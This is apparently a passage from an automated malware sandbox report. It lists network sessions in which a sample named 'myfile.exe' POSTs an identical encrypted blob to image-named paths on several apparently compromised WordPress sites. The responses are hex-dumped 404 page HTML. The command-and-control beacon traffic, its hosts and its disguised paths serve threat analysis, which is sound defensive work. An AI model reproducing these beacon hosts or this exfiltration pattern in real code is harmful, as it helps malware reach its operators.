                                                              Data Ascii: skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}@keyframes spin{to{transform:rotate(1turn)}}@keyframes ping{75%,to{opacity:0;transform:scale(2)}}@keyframes pulse{50%{opacity:.5}}@keyframes bounce{0%,to{
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 67 2d 6c 65 66 74 3a 31 30 70 78 7d 2e 74 65 78 74 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 62 61 73 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 69 74 61 6c 69 63 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 2e 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2a 2c 3a 61 66 74 65
                                                              Data Ascii: g-left:10px}.text-left{text-align:left}.text-center{text-align:center}.text-base{font-size:16px}.uppercase{text-transform:uppercase}.italic{font-style:italic}.text-white{--tw-text-opacity:1;color:#fff;color:rgba(255,255,255,var(--tw-text-opacity))}*,:afte
                                                              2024-09-09 10:07:20 UTC1369INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2c 63 6f 6c 6f 72 2c 66 69 6c 6c 2c 73 74 72 6f 6b 65 2c 6f 70 61 63 69 74 79 2c 62 6f 78 2d 73 68 61 64 6f 77 2c 74 72 61 6e 73 66 6f 72 6d 2c 66 69 6c 74 65 72 2c 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2c 63 6f 6c 6f 72 2c 66 69 6c 6c 2c 73 74 72 6f 6b 65 2c 6f 70 61 63 69 74 79 2c 62 6f 78 2d 73 68 61 64 6f 77 2c 74 72 61 6e 73 66 6f 72 6d 2c 66 69 6c 74 65 72 2c 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 2c 2d 77 65 62 6b 69 74 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67
                                                              Data Ascii: ound-color,border-color,color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter,-webkit-backdrop-filter;transition-timing


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.44975087.118.122.414437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:21 UTC263OUTPOST /static/tmp/vd.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: lexced.com
                                                              2024-09-09 10:07:21 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:21 UTC203INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.lexced.com/static/tmp/vd.gif
                                                              2024-09-09 10:07:21 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.44975187.118.122.414437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:22 UTC205OUTGET /static/tmp/vd.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.lexced.com
                                                              2024-09-09 10:07:23 UTC374INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:23 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: PHP/8.3.11
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://www.lexced.com/wp-json/>; rel="https://api.w.org/"
                                                              2024-09-09 10:07:23 UTC16010INData Raw: 31 63 63 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 62 73 74 63 6b 5f 63 6f 6e 74 65 78 74 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 65 78 63 65 64 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 62 73 74 63 6b 5f 63 6f 6e 74 65 78 74 3a 73 65 63 74 69 6f 6e 22 20 63 6f 6e
                                                              Data Ascii: 1cc9<!doctype html><html lang="it-IT" class="h-100"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="pbstck_context:site_name" content="lexced"/><meta name="pbstck_context:section" con
                                                              2024-09-09 10:07:23 UTC16384INData Raw: 28 27 74 72 61 63 6b 27 2c 20 27 50 61 67 65 56 69 65 77 27 2c 20 5b 5d 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 4d 65 74 61 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0a 3c 6e 6f 73 63 72 69 70 74 3e 0a 3c 69 6d 67 20 68 65 69 67 68 74 3d 22 31 22 20 77 69 64 74 68 3d 22 31 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 61 6c 74 3d 22 66 62 70 78 22 0a 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 74 72 3f 69 64 3d 37 36 32 36 32 32 36 34 39 31 32 31 31 38 39 26 65 76 3d 50 61 67 65 56 69 65 77 26 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 4d 65 74 61 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0a 0a 3c
                                                              Data Ascii: ('track', 'PageView', []); </script>... Meta Pixel Code --><noscript><img height="1" width="1" style="display:none" alt="fbpx"src="https://www.facebook.com/tr?id=762622649121189&ev=PageView&noscript=1" /></noscript>... End Meta Pixel Code --><


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.44975251.15.159.754437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:24 UTC281OUTPOST /data/graphic/tcafyhpt.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: chainofhopeeurope.eu
                                                              2024-09-09 10:07:24 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:24 UTC374INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:24 GMT
                                                              Server: Apache/2.4.61 (Debian)
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://www.chainofhopeeurope.eu/wp-json/>; rel="https://api.w.org/"
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              2024-09-09 10:07:24 UTC7818INData Raw: 31 65 35 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49
                                                              Data Ascii: 1e5d<!doctype html>...[if lt IE 7 ]><html lang="fr-FR" class="no-js oldie ie6"> <![endif]-->...[if IE 7 ]><html lang="fr-FR" class="no-js oldie ie7"> <![endif]-->...[if IE 8 ]><html lang="fr-FR" class="no-js oldie ie8"> <![endif]-->...[if I
                                                              2024-09-09 10:07:24 UTC3358INData Raw: 6f 62 73 6f 6c c3 a8 74 65 2e 2e 2e 3c 2f 73 74 72 6f 6e 67 3e 0a 09 09 09 3c 70 3e 50 6f 75 72 20 72 65 6d c3 a9 64 69 65 72 20 c3 a0 20 63 65 20 70 72 6f 62 6c c3 a8 6d 65 2c 20 6e 6f 75 73 20 76 6f 75 73 20 69 6e 76 69 74 6f 6e 73 20 c3 a0 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 6d 65 74 74 72 65 20 c3 a0 20 6a 6f 75 72 20 76 6f 74 72 65 20 6e 61 76 69 67 61 74 65 75 72 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 73 2d 63 6f 6d 70 61 74 69 62 69 6c 69 74 69 65 73 2d 63 6f 6e 74 65 6e 74 20 6d 65 73 73 61 67 65 73 2d 63 6f
                                                              Data Ascii: obsolte...</strong><p>Pour remdier ce problme, nous vous invitons <a href="http://browsehappy.com/" rel="nofollow" target="_blank">mettre jour votre navigateur</a>.</p></div><div class="messages-compatibilities-content messages-co
                                                              2024-09-09 10:07:24 UTC2INData Raw: 0d 0a
                                                              Data Ascii:
                                                              2024-09-09 10:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.449753160.153.0.1744437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:24 UTC281OUTPOST /data/game/mfkyhvlfokmitv.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: bayshoreelite.com
                                                              2024-09-09 10:07:24 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:25 UTC739INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              content-security-policy: upgrade-insecure-requests
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              link: <https://bayshoreelite.com/wp-json/>; rel="https://api.w.org/"
                                                              strict-transport-security: max-age=300
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              x-cacheproxy-retries: 0/2
                                                              x-content-type-options: nosniff
                                                              x-fawn-proc-count: 1,0,24
                                                              x-php-version: 7.4
                                                              x-xss-protection: 1; mode=block
                                                              x-backend: varnish_ssl
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 8c065f050cc80c7e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:25 UTC630INData Raw: 33 65 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71
                                                              Data Ascii: 3e49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"><head profile="http://gmpg.org/xfn/11"><meta http-eq
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 70 74 20 7b 20 62 6f 74 74 6f 6d 3a 20 30 3b 20 7d 0a 09 09 09 2e 73 6c 69 64 65 2d 65 78 63 65 72 70 74 20 7b 20 72 69 67 68 74 3a 20 30 3b 20 7d 0a 09 09 09 64 69 76 2e 73 6c 69 64 65 72 2d 6e 65 78 74 2c 20 64 69 76 2e 73 6c 69 64 65 72 2d 70 72 65 76 69 6f 75 73 20 7b 20 74 6f 70 3a 20 31 37 30 70 78 3b 20 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 61 79 73 68 6f 72 65 20 45 6c 69 74 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 79 73 68 6f 72 65 65 6c 69 74 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61
                                                              Data Ascii: pt { bottom: 0; }.slide-excerpt { right: 0; }div.slider-next, div.slider-previous { top: 170px; }</style><link rel="alternate" type="application/rss+xml" title="Bayshore Elite &raquo; Feed" href="https://bayshoreelite.com/feed/" /><link rel="a
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 62 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62
                                                              Data Ascii: c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76
                                                              Data Ascii: ObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return v
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 62 61 79 73 68 6f 72 65 65 6c 69 74 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69
                                                              Data Ascii: align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://bayshoreelite.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1' type='text/css' medi
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                                                              Data Ascii: pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradi
